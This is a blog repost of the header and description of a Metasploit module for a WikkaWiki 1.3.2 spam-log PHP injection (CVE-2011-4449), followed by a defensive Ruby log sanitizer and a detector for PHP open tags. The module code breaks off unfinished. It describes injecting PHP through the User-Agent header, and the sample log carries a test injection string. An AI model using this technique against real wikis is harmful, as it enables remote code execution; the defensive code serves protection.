
WikkaWiki 1.3.2 Spam Logging PHP Injection Method

程序员文章站 2021-12-19 19:05:29
Detailed code for the WikkaWiki 1.3.2 Spam Logging PHP injection... 12-05-14...
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "WikkaWiki 1.3.2 Spam Logging PHP Injection",
      'Description'    => %q{
          This module exploits a vulnerability found in WikkaWiki. When the spam logging
        feature is enabled, it is possible to inject PHP code into the spam log file via the
        UserAgent header, and then request it to execute our payload. There are at least
        three different ways to trigger spam protection, this module does so by generating
        10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).
          Please note that in order to use the injection, you must manually pick a page
        first that allows you to add a comment, and then set it as 'PAGE'.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'EgiX',   #Initial discovery, PoC
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2011-4449'],
          ['OSVDB', '77391'],
          ['EDB', '18177'],
          ['URL', 'http:// www.jb51.net /trac/wikka/ticket/1098']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Arch'           => ARCH_PHP,
      'Platform'       => ['php'],
      'Targets'        =>
        [
          ['WikkaWiki 1.3.2 r1814', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Nov 30 2011",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('USERNAME', [true, 'WikkaWiki username']),
        OptString.new('PASSWORD', [true,
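The module description above depends on a client-supplied User-Agent value being written verbatim into a log file that the web server will later run as PHP. The Ruby below is an added example, not part of the original page and not WikkaWiki or Metasploit code: it neutralises a header value before it is logged and scans an existing log for PHP open tags. The log line layout, the sample entries and all function names are assumptions constructed for illustration.

```ruby
# Added example: defensive handling of header values that end up in a log.
# Log layout, sample entries and names are constructed, not WikkaWiki's own.

# Sequences that begin PHP execution if a log file is ever parsed by PHP:
# "<?" (covers "<?php", "<?=" and short tags), "<%" (asp_tags, PHP 5) and
# <script language="php"> (PHP 5).
PHP_OPEN = /<\?|<%|<script\b[^>]*\bphp/i

# Neutralise a client-supplied header before writing it to a log:
# replace control characters (prevents forged log lines) and encode angle
# brackets so no PHP open tag can survive on disk.
def sanitize_for_log(value, max_len = 256)
  value.to_s.scrub('?')
       .gsub(/[\x00-\x1f\x7f]/, ' ')
       .gsub('<', '&lt;').gsub('>', '&gt;')
       .slice(0, max_len)
end

# Return [line_number, line] pairs for log lines that contain a PHP open tag.
def suspicious_lines(log_text)
  log_text.each_line.with_index(1)
          .select { |line, _| line =~ PHP_OPEN }
          .map { |line, n| [n, line.chomp] }
end

# Constructed sample log: the last field stands in for the logged User-Agent.
SAMPLE_LOG = <<~LOG
  2011-11-30 10:00:01 : 192.0.2.10 : comment : Mozilla/5.0 (X11; Linux x86_64)
  2011-11-30 10:00:07 : 192.0.2.77 : comment : <?php echo 1; ?>
  2011-11-30 10:00:09 : 192.0.2.10 : comment : curl/7.21.0
LOG

if __FILE__ == $PROGRAM_NAME
  suspicious_lines(SAMPLE_LOG).each { |n, line| puts "line #{n}: #{line}" }
  puts sanitize_for_log("<?php echo 1; ?>")
end
```

Encoding on write only protects new entries; storing logs outside the web root or under a name the server never hands to the PHP interpreter removes the execution path for entries that are already on disk.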
Related tags: PHP